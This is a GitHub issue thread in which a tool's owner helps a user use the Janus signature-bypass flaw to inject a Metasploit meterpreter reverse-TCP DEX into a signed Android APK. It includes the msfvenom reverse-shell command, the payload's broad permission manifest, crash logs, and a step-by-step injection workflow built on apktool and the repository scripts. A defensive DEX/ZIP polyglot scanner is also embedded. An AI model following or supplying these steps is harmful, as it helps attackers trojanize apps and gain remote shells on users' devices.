Help #1

Open
serrapa opened this issue Nov 16, 2023 · 26 comments
Labels
question Further information is requested

Comments

@serrapa

serrapa commented Nov 16, 2023

I tried it on a vulnerable apk. I generated the .dex file with msfvenom, then I used this tool to inject my payload.dex. However, if I analyze the generated apk with jadx-gui, I cannot find any references to my evil payload (msfvenom). Do you know why? Am I doing something wrong?

@giacomoferretti
Owner

giacomoferretti commented Nov 23, 2023

Hi @serrapa,
what you experienced is expected, as the injected .dex is not considered a valid file within the ZIP (APK) file. For this reason, JaDX is unable to parse it.

Try viewing the raw data with a hex editor and see if the .dex is placed correctly at the beginning of the file.
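As an added example (not code from this repository, and not the owner's hex-editor procedure), the following Python triage script does programmatically what the comment above suggests doing by hand. It checks whether a file starts with a DEX header while still ending in a ZIP central directory (the Janus layout), lists the entries a ZIP parser actually sees (bytes glued in front of the archive are never an entry, which is why JaDX shows nothing), and checks for an APK Signing Block, the structure used by APK Signature Scheme v2/v3, whose whole-file verification is what stops this layout on devices that enforce it (Android 7.0+). The sample archive, the zeroed DEX header and the empty signing block are constructed fixtures for the demo, not real APKs, payloads or signatures.

```python
import io
import struct
import zipfile

# Magic values from the DEX and ZIP formats and the APK Signing Block layout.
DEX_MAGIC_PREFIX = b"dex\n"                # followed by a version such as b"035\0"
EOCD_MAGIC = b"PK\x05\x06"                 # End Of Central Directory record
APK_SIG_BLOCK_MAGIC = b"APK Sig Block 42"  # last 16 bytes of an APK Signing Block


def find_eocd(data: bytes) -> int:
    """Return the offset of the EOCD record, or -1 if the data is not a ZIP.

    ZIP readers locate the archive from its END. That is exactly why a DEX
    header placed at the FRONT of an APK is invisible to tools like JaDX.
    """
    # EOCD is 22 bytes, optionally followed by a comment of at most 65535 bytes.
    start = max(0, len(data) - 22 - 65535)
    return data.rfind(EOCD_MAGIC, start)


def central_directory_offset(data: bytes) -> int:
    """Offset of the central directory as recorded in the EOCD (uint32 at EOCD+16)."""
    eocd = find_eocd(data)
    if eocd < 0:
        raise ValueError("no EOCD record: not a ZIP/APK")
    return struct.unpack_from("<I", data, eocd + 16)[0]


def is_dex_zip_polyglot(data: bytes) -> bool:
    """Janus-style layout: a DEX header at offset 0 AND a ZIP central directory at the end."""
    return data.startswith(DEX_MAGIC_PREFIX) and find_eocd(data) >= 0


def has_apk_signing_block(data: bytes) -> bool:
    """True if an APK Signing Block (scheme v2/v3) sits directly before the central directory."""
    cd = central_directory_offset(data)
    return cd >= 16 and data[cd - 16:cd] == APK_SIG_BLOCK_MAGIC


def zip_entry_names(data: bytes) -> list:
    """The entries a ZIP parser sees; anything prepended to the archive is never one of them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def scan_apk(data: bytes) -> dict:
    """Summary a triage script would log for one APK."""
    return {
        "dex_zip_polyglot": is_dex_zip_polyglot(data),
        "apk_signing_block": has_apk_signing_block(data),
        "entries": zip_entry_names(data),
    }


# ---- Constructed fixtures: not real APKs, not real DEX code, not real signatures ----

def build_sample_apk() -> bytes:
    """A minimal unsigned ZIP standing in for an APK; entry contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")        # placeholder, not binary XML
        zf.writestr("classes.dex", b"dex\n035\0" + b"\0" * 24)    # placeholder, not a loadable dex
    return buf.getvalue()


def make_polyglot_fixture(apk: bytes) -> bytes:
    """Reproduce only the FILE LAYOUT a scanner must flag: a zeroed 0x70-byte DEX header
    in front of the ZIP. No offsets are adjusted, so this is not a working injection."""
    return b"dex\n035\0" + b"\0" * 0x68 + apk


def add_empty_signing_block(apk: bytes) -> bytes:
    """Insert a structurally valid but content-free APK Signing Block before the central
    directory and patch the EOCD offset, purely to exercise has_apk_signing_block().
    A real block carries the v2/v3 signatures as ID-value pairs; this one carries none."""
    cd = central_directory_offset(apk)
    eocd = find_eocd(apk)
    pairs = b""
    size = 8 + len(pairs) + 16   # per the spec: excludes the leading size field, includes trailing size + magic
    block = struct.pack("<Q", size) + pairs + struct.pack("<Q", size) + APK_SIG_BLOCK_MAGIC
    new_eocd = apk[eocd:eocd + 16] + struct.pack("<I", cd + len(block)) + apk[eocd + 20:]
    return apk[:cd] + block + apk[cd:eocd] + new_eocd


if __name__ == "__main__":
    clean = build_sample_apk()
    for label, blob in [("clean", clean),
                        ("polyglot", make_polyglot_fixture(clean)),
                        ("v2-style", add_empty_signing_block(clean))]:
        print(label, scan_apk(blob))
```

Run it against a real APK by reading the file into `scan_apk()`: a `dex_zip_polyglot` of `True` is the condition worth alerting on, and `apk_signing_block` of `False` on an app that targets pre-7.0 devices is the configuration the owner describes above (v1-only signing) that left the app exposed.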

@serrapa
Author

serrapa commented Nov 24, 2023

Hey thanks for the response! Yes I was wrong, I checked the size of the apk at the end and obviously it's greater... don't know why I didn't do it before... anyway, I could not get the shell back, still I don't understand why, I tried it on an emulator and on a real device but nothing... have you ever tried to exploit the vuln in this way?

@giacomoferretti giacomoferretti added the question Further information is requested label Nov 24, 2023
@giacomoferretti
Owner

giacomoferretti commented Nov 24, 2023

No, I have never tried it that way. This project came in handy in 2019, as a popular app had not used signature v2 and I needed to keep the original signature. Now I use https://github.com/giacomoferretti/odex-patcher (unmaintained for now, needs root access).

Does the application crash? Check the logcats, and if so send them here.
If not, try to inject a simple app that uses a single Activity, with a single TextView as the content.
If that doesn't work, we'll need to dig deeper.

@serrapa
Author

serrapa commented Nov 24, 2023

Sorry, actually I didn't try it on a real device because I didn't have one with API < 24. I tried on the emulator and I thought there were problems at the network level... I set up the metasploit handler on my localhost and I created the shell with the remote host being 10.0.2.2 (the alias for the loopback interface for the emulator, as stated in the android docs)... Don't know if there would be some limitations by doing it this way... btw I'll try creating the activity with the textview as you say and I'll let you know asap! Thank you so much!

@serrapa
Author

serrapa commented Nov 25, 2023

I tried creating two projects on Android Studio (one benign app and one evil). Both of them are projects based on "Empty Views Activity" template and print a single log line:

  • "BENIGN", "This log line is legit."
  • "EVIL", "This log line is evil."

The following are the steps I followed:

  1. apktool d benign-release.apk -o benign-release
  2. python3 manifest_dummy.py benign-release/AndroidManifest.xml manifest
  3. cat manifest/manifest.xml
        <provider android:name="androidx.startup.InitializationProvider" android:authorities="fot.pcegi"/>
        <receiver android:name="androidx.profileinstaller.ProfileInstallReceiver"/>
     </application>
  4. Add the two classes (as normal Java classes that extend android.content.ContentProvider and android.content.BroadcastReceiver):
package androidx.profileinstaller;

import android.content.Context;
import android.content.Intent;

public class ProfileInstallReceiver extends android.content.BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {

    }
}
package androidx.startup;

import android.content.ContentValues;
import android.database.Cursor;
import android.net.Uri;

import androidx.annotation.NonNull;
import androidx.annotation.Nullable;

public class InitializationProvider extends android.content.ContentProvider {
    @Override
    public boolean onCreate() {
        return false;
    }

    @Nullable
    @Override
    public Cursor query(@NonNull Uri uri, @Nullable String[] projection, @Nullable String selection, @Nullable String[] selectionArgs, @Nullable String sortOrder) {
        return null;
    }

    @Nullable
    @Override
    public String getType(@NonNull Uri uri) {
        return null;
    }

    @Nullable
    @Override
    public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
        return null;
    }

    @Override
    public int delete(@NonNull Uri uri, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }

    @Override
    public int update(@NonNull Uri uri, @Nullable ContentValues values, @Nullable String selection, @Nullable String[] selectionArgs) {
        return 0;
    }
}
  5. python3 extract_dex.py evil-debug.apk evil.dex
  6. python3 janus.py evil.dex benign-release.apk benign-release-injected.apk (app installed successfully)
  7. Started the benign-release-injected app, which crashed. Here are the logs:
2023-11-25 16:03:44.298 16826-16826 System                  com.poc.benign                       W  ClassLoader referenced unknown path: /data/app/com.poc.benign-1/lib/arm64
2023-11-25 16:03:44.299 16826-16826 AndroidRuntime          com.poc.benign                       D  Shutting down VM
2023-11-25 16:03:44.299 16826-16826 AndroidRuntime          com.poc.benign                       E  FATAL EXCEPTION: main
                                                                                                    Process: com.poc.benign, PID: 16826
                                                                                                    java.lang.RuntimeException: Unable to get provider androidx.startup.InitializationProvider: java.lang.ClassNotFoundException: Didn't find class "androidx.startup.InitializationProvider" on path: DexPathList[[zip file "/data/app/com.poc.benign-1/base.apk"],nativeLibraryDirectories=[/data/app/com.poc.benign-1/lib/arm64, /vendor/lib64, /system/lib64]]
                                                                                                    	at android.app.ActivityThread.installProvider(ActivityThread.java:5156)
                                                                                                    	at android.app.ActivityThread.installContentProviders(ActivityThread.java:4748)
                                                                                                    	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4688)
                                                                                                    	at android.app.ActivityThread.-wrap1(ActivityThread.java)
                                                                                                    	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1405)
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:102)
                                                                                                    	at android.os.Looper.loop(Looper.java:148)
                                                                                                    	at android.app.ActivityThread.main(ActivityThread.java:5417)
                                                                                                    	at java.lang.reflect.Method.invoke(Native Method)
                                                                                                    	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726)
                                                                                                    	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)
                                                                                                    Caused by: java.lang.ClassNotFoundException: Didn't find class "androidx.startup.InitializationProvider" on path: DexPathList[[zip file "/data/app/com.poc.benign-1/base.apk"],nativeLibraryDirectories=[/data/app/com.poc.benign-1/lib/arm64, /vendor/lib64, /system/lib64]]
                                                                                                    	at dalvik.system.BaseDexClassLoader.findClass(BaseDexClassLoader.java:56)
                                                                                                    	at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
                                                                                                    	at java.lang.ClassLoader.loadClass(ClassLoader.java:469)
                                                                                                    	at android.app.ActivityThread.installProvider(ActivityThread.java:5141)
                                                                                                    	at android.app.ActivityThread.installContentProviders(ActivityThread.java:4748) 
                                                                                                    	at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4688) 
                                                                                                    	at android.app.ActivityThread.-wrap1(ActivityThread.java) 
                                                                                                    	at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1405) 
                                                                                                    	at android.os.Handler.dispatchMessage(Handler.java:102) 
                                                                                                    	at android.os.Looper.loop(Looper.java:148) 
                                                                                                    	at android.app.ActivityThread.main(ActivityThread.java:5417) 
                                                                                                    	at java.lang.reflect.Method.invoke(Native Method) 
                                                                                                    	at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:726) 
                                                                                                    	at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616) 
                                                                                                    	Suppressed: java.io.IOException: No original dex files found for dex location /data/app/com.poc.benign-1/base.apk
                                                                                                    		at dalvik.system.DexFile.openDexFileNative(Native Method)
                                                                                                    		at dalvik.system.DexFile.openDexFile(DexFile.java:295)
                                                                                                    		at dalvik.system.DexFile.<init>(DexFile.java:80)
                                                                                                    		at dalvik.system.DexFile.<init>(DexFile.java:59)
                                                                                                    		at dalvik.system.DexPathList.loadDexFile(DexPathList.java:279)
                                                                                                    		at dalvik.system.DexPathList.makePathElements(DexPathList.java:248)
                                                                                                    		at dalvik.system.DexPathList.<init>(DexPathList.java:120)
                                                                                                    		at dalvik.system.BaseDexClassLoader.<init>(BaseDexClassLoader.java:48)
                                                                                                    		at dalvik.system.PathClassLoader.<init>(PathClassLoader.java:65)
                                                                                                    		at android.app.ApplicationLoaders.getClassLoader(ApplicationLoaders.java:58)
                                                                                                    		at android.app.LoadedApk.getClassLoader(LoadedApk.java:376)
                                                                                                    		at android.app.LoadedApk.makeApplication(LoadedApk.java:568)
                                                                                                    		at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4680)
                                                                                                    		... 8 more
                                                                                                    	Suppressed: java.lang.ClassNotFoundException: androidx.startup.InitializationProvider
                                                                                                    		at java.lang.Class.classForName(Native Method)
                                                                                                    		at java.lang.BootClassLoader.findClass(ClassLoader.java:781)
                                                                                                    		at java.lang.BootClassLoader.loadClass(ClassLoader.java:841)
                                                                                                    		at java.lang.ClassLoader.loadClass(ClassLoader.java:504)
                                                                                                    		... 12 more
                                                                                                    	Caused by: java.lang.NoClassDefFoundError: Class not found using the boot class loader; no stack trace available

I don't understand what is wrong... I just noticed that the evil.dex file is just 20 bytes. Is it right that it looks for \x50\x4b\x03\x04? The one here https://github.com/V-E-O/PoC/blob/8c389899e6c4e16b2ddab9ba6d77c2696577366f/CVE-2017-13156/janus.py is different

@giacomoferretti
Owner

giacomoferretti commented Nov 25, 2023

extract_dex.py is not for extracting classes.dex files from a valid APK file, as written in the README it is for extracting the .dex file from an already injected APK file. It is not entirely your fault, but a misnomer on my part 😅

You need to extract the correct classes.dex file manually from the APK file.

@giacomoferretti
Owner

Damn, I coded it really badly... lol

@serrapa
Author

serrapa commented Nov 25, 2023

Aah I see.. anyway I also tried doing:

  • python3 janus.py classes.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes2.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes3.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes4.dex benign-release.apk benign-release-injected.apk

None of them worked ahaha. Digging deeper I think the problem is also multidexing, so I tried to build my evil apk without multidex (enabled by default on Android Studio), but I got errors because there are two instances of androidx.startup.InitializationProvider and androidx.profileinstaller.ProfileInstallReceiver... so I tried to remove androidx dependencies from the project, but the com.google.android.material:material:1.10.0 dependency is based on androidx, so fuck all ahaha.

Instead, if I generate the evil dex with msfvenom this way, for example msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex, the app does not crash but I cannot see any connection, not even with wireshark (I hoped to see at least an attempt towards 10.0.2.2:4444, but nothing...)

@giacomoferretti
Owner

Does the injected app have the android.permission.INTERNET permission?

@giacomoferretti
Owner

  • python3 janus.py classes.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes2.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes3.dex benign-release.apk benign-release-injected.apk
  • python3 janus.py classes4.dex benign-release.apk benign-release-injected.apk

Yes, forgot to mention that I've tested it with only one classes.dex file. You can try to inject them in the reverse order (classes4.dex, classes3.dex, ...), I don't know if it works.

@giacomoferretti
Owner

msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

Also, doesn't msfvenom -p android/meterpreter_reverse_tcp output an APK file? Be sure to extract the correct classes.dex.

@serrapa
Author

serrapa commented Nov 25, 2023

Does the injected app have the android.permission.INTERNET permission?

Yes

Yes, forgot to mention that I've tested it with only one classes.dex file. You can try to inject them in the reverse order (classes4.dex, classes3.dex, ...), I don't know if it works.

yeah, I supposed you tested with one dex... btw, the reverse order doesn't change anything either, the app crashes with the same error logs as above

@giacomoferretti
Owner

giacomoferretti commented Nov 25, 2023

Can you share the output file for this? msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

I don't have Metasploit installed, nor Kali Linux.

Thank you.

@serrapa
Author

serrapa commented Nov 25, 2023

Also, doesn't msfvenom -p android/meterpreter_reverse_tcp output an APK file? Be sure to extract the correct classes.dex.

Ooh yes, I totally forgot, but still no change ahah... I just tried with the classes.dex inside the output of apktool d --no-src meterpreter.dex -o meterpreter

Can you share the output file for this? msfvenom -p android/meterpreter_reverse_tcp LHOST=10.0.2.2 LPORT=4444 VERBOSE=true -o meterpreter.dex

It is not much and not helpful

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 72706 bytes
Saved as: meterpreter.dex

@giacomoferretti
Owner

giacomoferretti commented Nov 25, 2023

The meterpreter.dex file, not the console output.

@serrapa
Author

serrapa commented Nov 25, 2023

meterpreter.dex.zip

I needed to convert it as a zip because I cannot upload it as is on github...

@giacomoferretti
Owner

AndroidManifest.xml
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.metasploit.stage" platformBuildVersionCode="10" platformBuildVersionName="2.3.3">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SET_WALLPAPER"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-feature android:name="android.hardware.camera"/>
    <uses-feature android:name="android.hardware.camera.autofocus"/>
    <uses-feature android:name="android.hardware.microphone"/>
    <application android:label="@string/app_name">
        <activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <data android:host="my_host" android:scheme="metasploit"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <action android:name="android.intent.action.VIEW"/>
            </intent-filter>
        </activity>
        <receiver android:label="MainBroadcastReceiver" android:name=".MainBroadcastReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <service android:exported="true" android:name=".MainService"/>
    </application>
</manifest>

Note: all the permissions, receivers and services added will not be available once injected, because Android parses the correct AndroidManifest.xml inside the original APK.

@giacomoferretti
Owner

You could try to:

  1. Create a dummy app to generate the missing receivers, etc. of the target app using manifest_dummy.py
  2. Decode the dummy APK using apktool d -o dummy
  3. Decode meterpreter.dex using apktool d -o exploit
  4. Copy over the missing receivers, etc. inside the extracted meterpreter.dex
  5. Build the decoded meterpreter.dex using apktool b exploit
  6. Extract the classes.dex file from exploit.apk
  7. Inject it using janus.py

@serrapa
Author

serrapa commented Nov 25, 2023

You're right... but then how can I get code execution via a bad dex by exploiting the Janus vuln? Because it does not work with the classes.dex files from my evil.apk either (the app crashes)

@serrapa
Author

serrapa commented Nov 25, 2023

I'll try

@serrapa
Author

serrapa commented Nov 25, 2023

Extract the classes.dex file from exploit.apk

Here you mean with extract_dex.py?

Btw, the process looks like the one I did above with the evil and benign app, with fewer steps because I used the classes.dex file from the evil app and not from meterpreter.apk (I call it .apk and not .dex because it's confusing)

@giacomoferretti
Owner

Here you mean with extract_dex.py?

No, just extract it as a normal Zip file

@giacomoferretti
Owner

Btw, the process looks like the one I did above with the evil and benign app, with fewer steps because I used the classes.dex file from the evil app and not from meterpreter.apk (I call it .apk and not .dex because it's confusing)

Yes, it's similar. The thing is that the generated APK file from Metasploit is probably not compatible with the target app (because of receivers, etc), so you want the code from the Metasploit APK, but with the missing stuff from the target app (by using manifest_dummy.py).

@giacomoferretti
Owner

@serrapa any updates?

@serrapa
Author

serrapa commented Dec 4, 2023

Hey! I still have to try it, didn't have time these days.. I will notify here as soon as I'm done

@giacomoferretti
Owner

Perfect!
